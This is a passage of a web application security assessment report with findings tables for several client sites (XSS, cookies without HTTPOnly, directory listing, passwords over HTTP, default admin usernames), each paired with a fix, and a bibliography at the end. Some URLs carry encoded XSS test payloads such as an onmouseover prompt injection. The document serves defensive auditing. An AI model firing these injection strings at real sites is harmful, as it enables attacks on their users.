This is a case of bad design and a malicious user becomes unnecessarily aware of sensitive information

For #Site5 S. #

URL Issues Fixes Remarks/ Guidelines/ Future Best Practices

1 http://www.clientorganisation.org/index.php?index.php?cid=%22%20onmouseover%3dprompt%28909559%29%20bad%3d

XSS (Cross Site Scripting)

Proper Special Character Escaping

XSS (Cross site scripting) is the most prevalent web application security flaw. XSS flaws occur when


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an application includes user supplied data in a page sent to the browser without properly validating or escaping that content.

2 http://www.clientorganisation.org/d25ee9688199a2c7deb129f067c12098

Cookie not marked HTTPOnly

Ensure that all your cookies can only be modified at the server side by making it HTTPOnly

Not making cookies HTTPOnly means they can be modified by the user in the browser. If the cookie is used to store authentication information then this could be a serious issue since it is very easy to modify cookie value

3 http://www.clientorganisation.org/components/com_fund/images/patron_campaign/

Forbidden Resource

Implement some kind of redirect mechanism and remove links that lead to forbidden resources for unauthorized

This is a case of bad design and a malicious user becomes unnecessarily aware of sensitive


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users information4 https://


Directory listing of files

Prevent such access by turning directory listing off

This is similar to previous issue and it is very unwise and risky to let end user know the directory/file structure in your server

5 http://www.clientorganisation.org/x/wp-login.php

Password transmitted over HTTP

Implement SSL A malicious user in your network can access the packets you send using a sniffer program which might contain your username and password

For #Site6S. #

URL Issues Fixes Remarks/ Guidelines/ Future Best Practices

1 http://www.clientorganisation.org/photos/

XSS (Cross Site Scripting)

Proper Special Character Escaping

XSS (Cross site scripting) is the most prevalent web application security flaw. XSS flaws occur when


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an application includes user supplied data in a page sent to the browser without properly validating or escaping that content.

2 http://www.clientorganisation.org/wp-content/themes/x/

Internal Server Error (ISE)

Check your server side code and see if all scenarios are handled

ISE is usually triggered when exceptions are not properly handled at the server side

For #Site7All pages found in the given site are static pages (Web 1.0) and thus are not vulnerable to any form of attacksFor #Site8All pages found in the given site are static pages (Web 1.0) and thus are not vulnerable to any form of attacks

For #Site9S. #

URL Issues Fixes Remarks/ Guidelines/ Future Best Practices

1 http://www.clientorganisation.org/

Cookie not marked

Ensure that all your cookies can only be

Not making cookies HTTPOnly


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modified at the server side by making it HTTPOnly

means they can be modified by the user in the browser. If the cookie is used to store authentication information then this could be a serious issue since it is very easy to modify cookie value

2 http://www.clientorganisation.org/ayush/wp-comments-post.php

Internal Server Error (ISE)

Check your server side code and see if all scenarios are handled

ISE is usually triggered when exceptions are not properly handled at the server side

3 http://www.clientorganisation.org/modules/mod_swmenufree/styles/

Forbidden Resource

Implement some kind of redirect mechanism and remove links that lead to forbidden resources for unauthorized users

This is a case of bad design and a malicious user becomes unnecessarily aware of sensitive information

For #Site10S.

URL Issues Fixes Remarks/ Guidelines/


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# Future Best Practices

1 http://www.clientorganisation.org/cookie-a4db45188ef1d938df9ca84d6c1070ec

Cookie not marked HTTPOnly

Ensure that all your cookies can only be modified at the server side by making it HTTPOnly

Not making cookies HTTPOnly means they can be modified by the user in the browser. If the cookie is used to store authentication information then this could be a serious issue since it is very easy to modify cookie value

2 http://www.clientorganisation.org/modules/mod_swmenufree/cache/index.php?option=com_g2bridge&view=gallery&Itemid=161

Internal Server Error (ISE)

Check your server side code and see if all scenarios are handled

ISE is usually triggered when exceptions are not properly handled at the server side

3 http://www.clientorganisation.org/modules/mod_swmenufree/styles/

Directory listing of files

Prevent such access by turning directory listing off

This is similar to previous issue and it is very unwise and risky to let end user know the directory/file structure in your server


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4 http://www.clientorganisation.org/guest-book/index.php

XSS (Cross Site Scripting)

Provide proper character escaping in your pages and process URL to sanitize special characters.

XSS (Cross site scripting) is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content.

For #Site11S. #

URL Issues Fixes Remarks/ Guidelines/ Future Best Practices

1 http://www.clientorganisation.org/ASPSESSIONIDQQRADACA cookie name

Cookie not marked HTTPOnly

Ensure that all your cookies can only be modified at the server side by making it HTTPOnly

Not making cookies HTTPOnly means they can be modified by the user in the browser. If the cookie is used to store authentication information then this could be a serious issue


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since it is very easy to modify cookie value

2 http://www.clientorganisation.org/micro/ARRphotos/

Forbidden Resource

Implement some kind of redirect mechanism and remove links that lead to forbidden resources for unauthorized users

This is a case of bad design and a malicious user becomes unnecessarily aware of sensitive information

Note: Site is very small and not many pages (mostly static)

For #Site12S. #

URL Issues Fixes Remarks/ Guidelines/ Future Best Practices

1 http://www.clientorganisation.org/gallery/login/ajax

Password transmitted over HTTP

Implement SSL

A malicious user in your network can access the packets you send using a sniffer program which might contain your username and password

2 http://www.clientorganisation.org/e9566b07247a76e090a1d3317c6a07

Cookie not marked HTTPOnly

Ensure that all your cookies can only be modified at the server side by

Not making cookies HTTPOnly means they can be


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b1 making it HTTPOnly

modified by the user in the browser. If the cookie is used to store authentication information then this could be a serious issue since it is very easy to modify cookie value

3 http://www.clientorganisation.org/gallery/login/ajax

Auto complete enabled

Auto complete must be disabled in the form tag

Auto complete enabled for a form may lead to unauthorized users getting access to privileged information in same machine

4 http://www.clientorganisation.org/gallery/login/auth_ajax

Internal Server Error (ISE)

Check your server side code and see if all scenarios are handled

ISE is usually triggered when exceptions are not properly handled at the server side

5 http://www.clientorganisation.org/plugins/content/highslide/config/

Forbidden Resource

Implement some kind of redirect mechanism and remove links that lead to forbidden resources for

This is a case of bad design and a malicious user becomes unnecessarily aware of sensitive


Page 130: Semi-Automated Security Testing of Web applications

unauthorized users


For #Site13S. #

URL Issues Fixes Remarks/ Guidelines/ Future Best Practices

1 http://clientorganisation.com/wp-login.php

Password transmitted over HTTP

Implement SSL

A malicious user in your network can access the packets you send using a sniffer program which might contain your username and password

2 http://clientorganisation.com/wp-login.php

Auto complete enabled

Auto complete must be disabled in the form tag

Auto complete enabled for a form may lead to unauthorized users getting access to privileged information in same machine

3 http://clientorganisation.com/wp-content/plugins/promotion-slider

yes only here modified

Internal Server Error (ISE)

Check your server side code and see if all scenarios are handled

ISE is usually triggered when exceptions are not properly handled at the server side

4 http:// Cookie Ensure that all Not making


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not marked HTTPOnly

your cookies can only be modified at the server side by making it HTTPOnly

cookies HTTPOnly means they can be modified by the user in the browser. If the cookie is used to store authentication information then this could be a serious issue since it is very easy to modify cookie value

5 http://clientorganisation.com/wp-login.php

Security Mis - configuration

Change administrator credentials (Different username and password)

Brute Force attack is highly possible since attacker already knows your username and username like admin is highly common

6 http://clientorganisation.com/contact-us

XSS (Cross Site Scripting)

Provide proper character escaping in your pages and process URL to sanitize special characters.

XSS (Cross site scripting) is the most prevalent web application security flaw. XSS flaws occur when an application


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includes user supplied data in a page sent to the browser without properly validating or escaping that content.

For #Site14S. #

URL Issues Fixes Remarks/ Guidelines/ Future Best Practices

1 http://www.clientorganisation.com/store/browse-products

Password transmitted over HTTP

Implement SSL A malicious user in your network can access the packets you send using a sniffer program which might contain your username and password

2 http://www.clientorganisation.com/store/browse-products

Auto complete enabled

Auto complete must be disabled in the form tag

Auto complete enabled for a form may lead to unauthorized users getting access to privileged information in same machine

3 http://www.clientorgani

Internal Server

Check your server side code

ISE is usually triggered


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Error (ISE)

and see if all scenarios are handled

when exceptions are not properly handled at the server side

4 http://www.clientorganisation.com/images/stories/headers/?C=''

Directory listing of files

Prevent such access by turning directory listing off

This is similar to previous issue and it is very unwise and risky to let end user know the directory/file structure in your server

5 http://www.clientorganisation.com/images/stories/headers/?C='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3E%3C/script%3E

Forbidden Resource

Implement some kind of redirect mechanism and remove links that lead to forbidden resources for unauthorized users

This is a case of bad design and a malicious user becomes unnecessarily aware of sensitive information

6 http://www.clientorganisation.com/cheryl/booking-requestpath%20info%20visible--/home/midnmys6/public_html/libraries/joomla/filter/filterinput.php/n

Resource no longer available

Remove the link to the page since the resource is no longer available

This is a case of bad design but is not a vulnerability


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7 http://www.clientorganisation.com/

Cookie not marked HTTPOnly

Ensure that all your cookies can only be modified at the server side by making it HTTPOnly

Not making cookies HTTPOnly means they can be modified by the user in the browser. If the cookie is used to store authentication information then this could be a serious issue since it is very easy to modify cookie value


1. Anderson, R. Security Engineering: A Guide to Building Dependable Distributed Systems. Indianapolis: John Wiley & Sons, 2001.

2. Archer, Tom and Whitechapel. Andrew. Inside C#. Redmond: Microsoft Press, 2002.

3. Deraison, Renaud. The Nessus Security Scanner. http://www.nessus.com/

4. Garfinkel, Simson, Spafford, Eugene H., and Schwartz Alan. Practical Unix & Internet Security, 3rd Edition. Sebastapol: O’Reilly, 2003.

5. Gordon, Lawrence, Loeb, Martin, Lucyshyn, William and Richardson, Robert. “2004 CSI/FBI Computer Crime and Security Survey,” San Francisco: Computer Security Institute, 2004.

6. International Standards Organization, International Electrotechnical Commission. Information technology — Code of practice for


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information security management. ISO/IEC 17799:2000(E). Switzerland: ISO/IEC, 2001.

7. Open Web Application Security Project. “The Ten Most Critical Web Application Security Vulnerabilities – 2004 Update.” OWASP, 2004. https://www.owasp.org/index.php/Top_10_2010-Main

8. Peltier, Thomas R. Information Security Risk Analysis. Boca Raton: CRC Press, 2001.

9. Public Law No. 100-235. The Computer Security Act of 1987.

10.Stoneburner, Gary, Goguen, Alice, and Feringa, Alexis. “Risk Management Guide for Information Technology Systems.” NIST Special Publication 800-30. National Institute of Standards and Technology, 2001.

11.Stoneburner, Gary, Hayden, Clark, and Feringa, Alexis. “Engineering Principles for Information Technology Security (A Baseline for Achieving Security).” NIST Special Publication 800-27 Rev A. National Institute of Standards and Technology, 2004.

12.Swiderski, Frank and Snyder, Window. Threat Modeling. Redmond: Microsoft Press, 2004.

13.United States Department of Agriculture. “USDA Information Systems Security Policy.” USDA 3140-001. Washington: USDA, 1996.

14.Viega, John and McGraw, Gary. Building Secure Software. Indianapolis: Addison-Wesley, 2002.

15.Wood, Charles C., Banks, William W., Guarro, Sergio B., Garcia, Abel A., Hampel, Victor E., and Sartorio, Henry P. Computer Security. New York: Wiley, 1987.

16.Zwicky, Elizabeth D., Cooper, Simon, and Chapman, D. Brent. Building Internet Firewalls, 2nd Edition. Sebastapol: O’Reilly, 2000.

17. Keith A. Watson, Security Assessment Template based on which this report was made, CISSP on March 1, 2005


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